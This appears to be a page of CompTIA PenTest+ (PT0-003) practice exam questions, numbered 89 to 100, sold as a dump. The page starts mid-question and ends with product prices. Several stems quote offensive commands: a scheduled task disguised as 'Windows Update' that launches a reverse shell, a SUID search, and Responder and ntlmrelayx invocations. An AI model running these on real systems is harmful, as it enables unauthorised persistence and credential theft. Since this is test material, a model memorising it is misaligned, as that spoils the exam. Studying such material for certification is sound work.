Options:

A.

Goal reprioritization

B.

Peer review

C.

Client acceptance

D.

Stakeholder alignment

Buy Now
Questions 89

During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?

Options:

A.

Burp Suite

B.

Netcat

C.

Responder

D.

Nmap

Buy Now
Questions 90

A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

Options:

A.

Configure and register a service.

B.

Install and run remote desktop software.

C.

Set up a script to be run when users log in.

D.

Perform a kerberoasting attack on the host.

Buy Now
Questions 91

A penetration tester is evaluating a company ' s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign. Which of the following tools and techniques are most applicable in this scenario? (Select two).

Options:

A.

TruffleHog for collecting credentials

B.

Shodan for identifying potential targets

C.

Gophish for sending phishing emails

D.

Maltego for organizing targets

E.

theHarvester for discovering additional targets

F.

Evilginx for handling legitimate authentication requests through a proxy

Buy Now
Questions 92

A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output:

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl

200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0

No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python

Which of the following actions should the tester take to get the scans to work properly?

Options:

A.

Modify the scanner to slow down the scan.

B.

Change the source IP with a VPN.

C.

Modify the scanner to only use HTTP GET requests.

D.

Modify the scanner user agent.

Buy Now
Questions 93

A penetration tester executes multiple enumeration commands to find a path to escalate privileges. Given the following command:

find / -user root -perm -4000 -exec ls -ldb {} \; 2 > /dev/null

Which of the following is the penetration tester attempting to enumerate?

Options:

A.

Attack path mapping

B.

API keys

C.

Passwords

D.

Permission

Buy Now
Questions 94

During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command:

schtasks /create /sc onlogon /tn " Windows Update " /tr " cmd.exe /c reverse_shell.exe "

Which of the following is the penetration tester trying to do with this code?

Options:

A.

Enumerate the scheduled tasks

B.

Establish persistence

C.

Deactivate the Windows Update functionality

D.

Create a binary application for Windows System Updates

Buy Now
Questions 95

A penetration tester successfully phishes a user and compromises a domain-joined endpoint. The tester enumerates the domain controller and discovers that Group Policy Preferences are in use. The tester also finds that the version of the domain controllers is Windows Server 2012. The tester wants to use the fastest possible method of pivoting successfully to multiple production servers joined to the domain. Which of the following is the best way to achieve this goal?

Options:

A.

Scan the domain controller and locate an RCE using a Metasploit module with a reverse shell.

B.

Run Hydra to password spray any dumped credentials from the initial host across subnets.

C.

Use BloodHound to look for escalation paths against the AD environment.

D.

Find the SYSVOL share for hashes with findstr /i and decrypt using the published key.

Buy Now
Questions 96

A penetration tester launches an attack against company employees. The tester clones the company ' s intranet login page and sends the link via email to all employees.

Which of the following best describes the objective and tool selected by the tester to perform this activity?

Options:

A.

Gaining remote access using BeEF

B.

Obtaining the list of email addresses using theHarvester

C.

Harvesting credentials using SET

D.

Launching a phishing campaign using GoPhish

Buy Now
Questions 97

A penetration tester has been asked to conduct a blind web application test against a customer ' s corporate website. Which of the following tools would be best suited to perform this assessment?

Options:

A.

ZAP

B.

Nmap

C.

Wfuzz

D.

Trufflehog

Buy Now
Questions 98

A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?

Options:

A.

Shoulder surfing

B.

Recon-ng

C.

Social media

D.

Password dumps

Buy Now
Questions 99

During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client ' s internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results. Which of the following should the tester have done?

Options:

A.

Rechecked the scanner configuration.

B.

Performed a discovery scan.

C.

Used a different scan engine.

D.

Configured all the TCP ports on the scan.

Buy Now
Questions 100

A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?

Options:

A.

ntlmrelayx.py -t 192.168.1.0/24 -1 1234

B.

nc -tulpn 1234 192.168.1.2

C.

responder.py -I eth0 -wP

D.

crackmapexec smb 192.168.1.0/24

Buy Now
Exam Code: PT0-003
Exam Name: CompTIA PenTest+ Exam
Last Update: Jun 27, 2026
Questions: 330
PT0-003 pdf

PT0-003 PDF

$25.5  $84.99
PT0-003 Engine

PT0-003 Testing Engine

$30  $99.99
PT0-003 PDF + Engine

PT0-003 PDF + Testing Engine

$40.5  $134.99